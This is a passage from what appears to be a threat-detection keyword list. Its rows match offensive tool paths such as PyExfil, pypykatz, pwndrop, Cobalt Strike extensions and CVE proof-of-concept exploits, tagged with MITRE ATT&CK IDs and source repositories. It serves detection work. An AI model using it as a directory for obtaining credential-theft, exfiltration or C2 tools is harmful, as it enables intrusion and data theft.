"*/pwcrack.sh*",".{0,1000}\/pwcrack\.sh.{0,1000}","offensive_tool_keyword","nsa-rules","Password cracking rules and masks for hashcat that I generated from cracked passwords.","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/NSAKEY/nsa-rules","1","1","N/A","10","6","513","124","2017-01-03T11:53:25Z","2016-02-15T20:49:32Z" "*/pwn_php.me*",".{0,1000}\/pwn_php\.me.{0,1000}","offensive_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","9","4","359","72","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" 
"*/pwn_python.me*",".{0,1000}\/pwn_python\.me.{0,1000}","offensive_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","9","4","359","72","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "*/PwnDB.py*",".{0,1000}\/PwnDB\.py.{0,1000}","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","OSINT exploitation tools","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","10","970","103","2024-04-07T21:32:39Z","2020-04-07T22:25:38Z" "*/pwndrop.git*",".{0,1000}\/pwndrop\.git.{0,1000}","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","1","N/A","10","10","1884","253","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z" "*/pwndrop.ini*",".{0,1000}\/pwndrop\.ini.{0,1000}","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","0","N/A","10","10","1884","253","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z" "*/Pwned.as*",".{0,1000}\/Pwned\.as.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/PwnKit-Exploit*",".{0,1000}\/PwnKit\-Exploit.{0,1000}","offensive_tool_keyword","POC","exploitation of CVE-2021-4034","T1210","N/A","N/A","N/A","Exploitation tools","https://github.com/luijait/PwnKit-Exploit","1","1","N/A","N/A","1","82","15","2022-02-07T15:42:00Z","2022-01-26T18:01:26Z" "*/pxesploit/*",".{0,1000}\/pxesploit\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/PXEThief*",".{0,1000}\/PXEThief.{0,1000}","offensive_tool_keyword","pxethief","PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager","T1555.004 - T1555.002","TA0006","N/A","N/A","Credential Access","https://github.com/MWR-CyberSec/PXEThief","1","1","N/A","N/A","3","253","30","2024-01-29T18:10:17Z","2022-08-12T22:16:46Z" "*/pxexploit*",".{0,1000}\/pxexploit.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/py_oneliner.py*",".{0,1000}\/py_oneliner\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/pyasn1/*",".{0,1000}\/pyasn1\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*/PyClone.py*",".{0,1000}\/PyClone\.py.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","1","N/A","8","7","686","119","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z" "*/pycobalt-*",".{0,1000}\/pycobalt\-.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*/pycobalt/*",".{0,1000}\/pycobalt\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*/PyExec.git*",".{0,1000}\/PyExec\.git.{0,1000}","offensive_tool_keyword","PyExec","This is a very simple privilege escalation technique from admin to System. 
This is the same technique PSExec uses.","T1134 - T1055 - T1548.002","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/OlivierLaflamme/PyExec","1","1","N/A","9","1","10","7","2019-09-11T13:56:04Z","2019-09-11T13:54:15Z" "*/PyExfil.git*",".{0,1000}\/PyExfil\.git.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*/PyExfil/pyexfil/*",".{0,1000}\/PyExfil\/pyexfil\/.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*/pykiller/CVE-2022-23131*",".{0,1000}\/pykiller\/CVE\-2022\-23131.{0,1000}","offensive_tool_keyword","POC","POC exploitation of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/pykiller/CVE-2022-23131","1","1","N/A","N/A","1","0","0","2022-02-24T11:59:48Z","2022-02-24T11:34:27Z" "*/pyLAPS.git*",".{0,1000}\/pyLAPS\.git.{0,1000}","offensive_tool_keyword","pyLAPS","A simple way to read and write LAPS passwords from linux.","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/p0dalirius/pyLAPS","1","1","N/A","9","1","60","11","2024-03-31T12:13:57Z","2021-10-05T18:35:21Z" "*/pyLAPS.py*",".{0,1000}\/pyLAPS\.py.{0,1000}","offensive_tool_keyword","pyLAPS","A simple way to read and write LAPS passwords from linux.","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential 
Access","https://github.com/p0dalirius/pyLAPS","1","1","N/A","9","1","60","11","2024-03-31T12:13:57Z","2021-10-05T18:35:21Z" "*/Pyobfadvance*",".{0,1000}\/Pyobfadvance.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","10","8","N/A","N/A","N/A","N/A" "*/Pyobfexecute*",".{0,1000}\/Pyobfexecute.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","10","8","N/A","N/A","N/A","N/A" "*/pyobfgood*",".{0,1000}\/pyobfgood.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","10","8","N/A","N/A","N/A","N/A" "*/Pyobflite*",".{0,1000}\/Pyobflite.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","10","8","N/A","N/A","N/A","N/A" "*/Pyobfpremium*",".{0,1000}\/Pyobfpremium.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","10","8","N/A","N/A","N/A","N/A" 
"*/Pyobftoexe*",".{0,1000}\/Pyobftoexe.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","10","8","N/A","N/A","N/A","N/A" "*/Pyobfuse*",".{0,1000}\/Pyobfuse.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","10","8","N/A","N/A","N/A","N/A" "*/Pyobfusfile*",".{0,1000}\/Pyobfusfile.{0,1000}","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","10","8","N/A","N/A","N/A","N/A" "*/pypykatz*",".{0,1000}\/pypykatz.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*/pypykatz.py*",".{0,1000}\/pypykatz\.py.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/skelsec/pypykatz","1","1","N/A","10","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*/Pyramid.git*",".{0,1000}\/Pyramid\.git.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*/pyramid.py*",".{0,1000}\/pyramid\.py.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*/pyrdp.git*",".{0,1000}\/pyrdp\.git.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" 
"*/pyrdp:latest*",".{0,1000}\/pyrdp\:latest.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*/pyrdp_mitm-*",".{0,1000}\/pyrdp_mitm\-.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*/pysnaffler.git*",".{0,1000}\/pysnaffler\.git.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. 
Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","1","N/A","10","1","75","4","2023-12-03T20:02:25Z","2023-11-17T21:52:40Z" "*/Pysoserial.git*",".{0,1000}\/Pysoserial\.git.{0,1000}","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","1","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" "*/pysoxy.git*",".{0,1000}\/pysoxy\.git.{0,1000}","offensive_tool_keyword","pysoxy","A small Socks5 Proxy Server in Python","T1090","TA0011","N/A","N/A","C2","https://github.com/MisterDaneel/pysoxy","1","1","N/A","10","10","118","47","2023-10-15T06:12:45Z","2016-04-21T07:56:24Z" "*/pysoxy.py*",".{0,1000}\/pysoxy\.py.{0,1000}","offensive_tool_keyword","pysoxy","A small Socks5 Proxy Server in Python","T1090","TA0011","N/A","N/A","C2","https://github.com/MisterDaneel/pysoxy","1","1","N/A","10","10","118","47","2023-10-15T06:12:45Z","2016-04-21T07:56:24Z" "*/pystinger.zip*",".{0,1000}\/pystinger\.zip.{0,1000}","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. 
It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","10","10","1336","207","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z" "*/Python-dynload-os.h*",".{0,1000}\/Python\-dynload\-os\.h.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/pythonmemorymodule.py*",".{0,1000}\/pythonmemorymodule\.py.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*/Python-Rootkit.git*",".{0,1000}\/Python\-Rootkit\.git.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","1","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*/pywerview*",".{0,1000}\/pywerview.{0,1000}","offensive_tool_keyword","pywerview","A partial Python rewriting of PowerSploit PowerView","T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/the-useless-one/pywerview","1","1","N/A","N/A","9","835","111","2024-04-12T10:12:03Z","2016-07-06T13:25:09Z" 
"*/pywhisker.git*",".{0,1000}\/pywhisker\.git.{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","1","N/A","10","6","540","62","2023-12-17T12:46:07Z","2021-07-21T19:20:00Z" "*/pywsus.git*",".{0,1000}\/pywsus\.git.{0,1000}","offensive_tool_keyword","pywsus","The main goal of this tool is to be a standalone implementation of a legitimate WSUS server which sends malicious responses to clients. The MITM attack itself should be done using other dedicated tools such as Bettercap.","T1505.003 - T1001.001 - T1560.001 - T1071.001","TA0003 - TA0011 - TA0002","N/A","N/A","Network Exploitation tools","https://github.com/GoSecure/pywsus","1","1","N/A","N/A","3","272","44","2022-11-11T19:59:21Z","2020-08-11T21:44:35Z" "*/pywsus.py*",".{0,1000}\/pywsus\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/pywsus-master.zip*",".{0,1000}\/pywsus\-master\.zip.{0,1000}","offensive_tool_keyword","pywsus","The main goal of this tool is to be a standalone implementation of a legitimate WSUS server which sends malicious responses to clients. 
The MITM attack itself should be done using other dedicated tools such as Bettercap.","T1505.003 - T1001.001 - T1560.001 - T1071.001","TA0003 - TA0011 - TA0002","N/A","N/A","Network Exploitation tools","https://github.com/GoSecure/pywsus","1","1","N/A","N/A","3","272","44","2022-11-11T19:59:21Z","2020-08-11T21:44:35Z" "*/qakbot.profile*",".{0,1000}\/qakbot\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/qconn-exec.nse*",".{0,1000}\/qconn\-exec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/QHpix/CVE-2021-44521*",".{0,1000}\/QHpix\/CVE\-2021\-44521.{0,1000}","offensive_tool_keyword","POC","Automated PoC exploitation of CVE-2021-44521","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/QHpix/CVE-2021-44521","1","1","N/A","N/A","1","9","2","2022-02-24T12:04:40Z","2022-02-24T11:07:34Z" "*/qscan.nse*",".{0,1000}\/qscan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - 